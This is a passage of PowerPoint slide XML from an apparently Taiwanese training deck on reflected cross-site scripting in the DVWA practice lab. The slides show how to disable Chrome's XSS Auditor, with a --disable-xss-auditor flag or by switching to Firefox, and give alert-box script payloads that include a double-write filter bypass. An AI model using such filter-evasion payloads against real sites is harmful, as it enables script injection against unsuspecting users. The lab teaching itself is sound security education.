            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>XSS auditor</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="160660" y="1768014"/>
            <a:ext cx="1785104" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Chrome 61</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3696404" y="3211408"/>
            <a:ext cx="4342022" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Chrome 61</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>擋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>掉了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>! </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4220691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Reflected Cross Site Scripting exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
              <a:t>in DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>全部殘念</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2017.10.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>偉大的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chrome 61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>或關掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Auditor??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14161854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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="365126"/>
            <a:ext cx="9144000" cy="1010593"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>直接安裝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，不會擋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.mozilla.org/zh-TW/firefox/new/</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031" y="1719494"/>
            <a:ext cx="9144000" cy="4732656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2739270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a:xfrm>
            <a:off x="0" y="365126"/>
            <a:ext cx="9144000" cy="775697"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google chrome::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>關閉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auditor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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408" y="1375719"/>
            <a:ext cx="2276392" cy="5270500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941696" y="1995477"/>
            <a:ext cx="663196" cy="7340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1562443" y="6449371"/>
            <a:ext cx="817986" cy="1905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822" y="1724969"/>
            <a:ext cx="3590925" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6607437" y="3185459"/>
            <a:ext cx="1175147" cy="3010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6607437" y="2719678"/>
            <a:ext cx="2146357"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dirty="0" smtClean="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>disable-xss-auditor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="向右箭號 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476747" y="4010969"/>
            <a:ext cx="981075" cy="592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829662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02262"/>
            <a:ext cx="9144000" cy="4659535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3108960" y="1706880"/>
            <a:ext cx="2960914" cy="92310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向下箭號 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3709851" y="714103"/>
            <a:ext cx="1532709" cy="1071154"/>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smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>功</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3672588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5123" y="1731608"/>
            <a:ext cx="4954370" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> test1')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="181942"/>
            <a:ext cx="9144000" cy="1307154"/>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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Javascript</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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>語法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6407231"/>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87" y="3115648"/>
            <a:ext cx="8617520" cy="2042020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28012375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181942"/>
            <a:ext cx="9144000" cy="1307154"/>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a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DVWA_1.10_Medium</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRP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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Javascript</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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>語法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87086" y="6372397"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235290" y="1676926"/>
            <a:ext cx="5270995" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>試看看上次攻擊是否成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>???</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519820" y="2449531"/>
            <a:ext cx="4954370" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> test1')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14908457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181942"/>
            <a:ext cx="9144000" cy="1307154"/>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a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DVWA_1.10_Medium</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRP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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Javascript</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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>語法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6407231"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615734" y="2110216"/>
            <a:ext cx="6507878" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>ript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> test2')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235290" y="1676926"/>
            <a:ext cx="2262158" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>雙寫繞過的攻擊技術</a:t>
            </a:r>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90" y="2928988"/>
            <a:ext cx="8458200" cy="2038350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2264494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181942"/>
            <a:ext cx="9144000" cy="1307154"/>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a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DVWA_1.10_Medium</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRP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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
